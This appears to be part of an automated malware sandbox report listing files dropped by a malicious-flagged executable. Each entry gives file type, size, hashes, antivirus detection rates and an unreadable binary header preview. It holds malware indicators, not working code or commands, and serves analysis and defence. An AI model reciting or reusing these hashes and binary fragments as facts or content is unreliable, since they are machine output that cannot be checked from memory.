                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):89600
                                                          Entropy (8bit):5.905167202474779
                                                          Encrypted:false
                                                          SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                          MD5:06442F43E1001D860C8A19A752F19085
                                                          SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                          SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                          SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 16%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):28160
                                                          Entropy (8bit):5.570953308352568
                                                          Encrypted:false
                                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with very long lines (732), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):732
                                                          Entropy (8bit):5.897697801993887
                                                          Encrypted:false
                                                          SSDEEP:12:3TpIYvKG/tG5dZLfIIIkER6dARCyntViqXUZ0QyHaaSDS+ol+Bsp5Gll:j2YCG/EjLfVIkevtRXMVDasSvkuAll
                                                          MD5:FC608FA44DB3F5341BAF92C43E0A591E
                                                          SHA1:30750264377415DD45B9F3D03EC9A087565A64AA
                                                          SHA-256:45840A6DDA3EBDFE050778E6982D4173BEEEB7BFA3582BC1BBD63F7AF95439AA
                                                          SHA-512:C0EF542298229C00F8795C51B727A1E8B21A3D7F254FC5E4C88081E8BB00D22161A26EFDD7D6B1B0CDE8FD8A44AE17625C5A77DD48A2CBA9C77E0351F47E90FC
                                                          Malicious:false
                                                          Preview:3ICw54E29DBabP9NFvCsI6LOycuyKzH6GsQpLrSxMz7btqTuadrlnFk77y7cJPsK5EUt8UCYdPgT9teIIAYrHfTAHTrWtzn6HxfoVkvFbTIXiR7NTyTI1BDavTlpmponmjLMO0xiPTPxW5b0VeD5feFFuF3B8Gcwpfv9Fv9dBv3ivPD01vTImtHHeFcJ6vjJ0dI1Jcukfj3ulhUeBCJNwUJ5Xoe9T0gPMurRGLrZAsnCzXf7v7H4mVWfUNdf8vRpCoi1zCY0VuMErGFAIhOWsmn0XL73sLaPb8ALyoIsiRi1ISyNHcWah56ZArdnFfHJT7msG4LeZfxbDvrFWuvPzArgCkKHKenDJZiLpGHNQ1BBHeWPAXQUt1UTPFqftET42tSoNgZQni978pZhO5HxOSURFO5kZldMiHJXLsBd89rK2WVjqIRx7gqjZAi9kz1BFwZ0gBWf3nyOkJZt3V3QUqOBbj7LJC2IIpFF6eDpwv3Trb8PlzGP5lrZiYZ6DKW1uqG5ETwYROdiw5T9ksjT6nNg8qhiFHllZCjBVDLRDr7qHJmmEZVVlC5Gcj7YwOTKm1IuWSohgSQOqgYyD4epvQAXGcivGxfzYwDQA2QvvyyTvqa6KIU1toYW0vn3t3aswb03cIyKns47brlaBmk8cnFuYrZPPXC1XGgTzhdCUJOBtb4JJM2HScQJWGfvtj4QqCjVLRkeJinSZEA7wQFDe4i5zW7t
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3861504
                                                          Entropy (8bit):7.835766949495404
                                                          Encrypted:false
                                                          SSDEEP:98304:SlFTtIkKJ8h91Zv7aphwzT8YRMR9UOu93dI:S7SF8/baTm8kMPUOu9
                                                          MD5:798B5560B2A2C6596A0C1A09419AD2C4
                                                          SHA1:6F18005EAACE373EE3EC23138C7D5AF9D1BCB51E
                                                          SHA-256:93DC0D7CACC55D4965A1D55A3D163125481EE2BE7CEF9640320F58D714BD8011
                                                          SHA-512:ED88BAD4B7E2103222EFC1864E36A6B6D9E83396361191C6D9ED0623BADB783629E87A2CC2097D4D79586D9514D02D15DF7B411C1A012BEB212009EFE2E24010
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................:...........;.. ... ;...@.. .......................`;...........@...................................;.K.... ;.p....................@;...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...p.... ;.......:.............@....reloc.......@;.......:.............@..B..................;.....H...........@.......e...D....)0.'.;......................................0..........(.... ........8........E....)...M.......q...8$...(.... ....~....{....:....& ....8....(.... ....~....{~...:....& ....8....(.... ....~....{{...9....& ....8z...*...0..<....... ........8........E............................d...8)...~....9U... ....~....{....:....& ....8....~....(#... .... .... ....s....~....('....... ....8{......... ....~....{....9a...& ....8V...8z... ....~....{....9=...& ....82...
                                                          Process:C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe
                                                          File Type:ASCII text, with very long lines (585), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):585
                                                          Entropy (8bit):5.888407059501936
                                                          Encrypted:false
                                                          SSDEEP:12:2RxUyC1c4o1TyJmfmlRjxCLX760qmVF+e8/knGyHFpFTfk9ZFLi12JpH:2RxUygcZ1T4TLVE760pVw0DHFffmhpH
                                                          MD5:BFBDE87996E8A8435245C2E9E5EA0C12
                                                          SHA1:349269B7FA06FD0A3BAA6B0E739029B263C8753A
                                                          SHA-256:7A17B09C73546E31D72451AB7D937465210EB8C4CCF8D5FADA5A6A4E7DEB6CBA
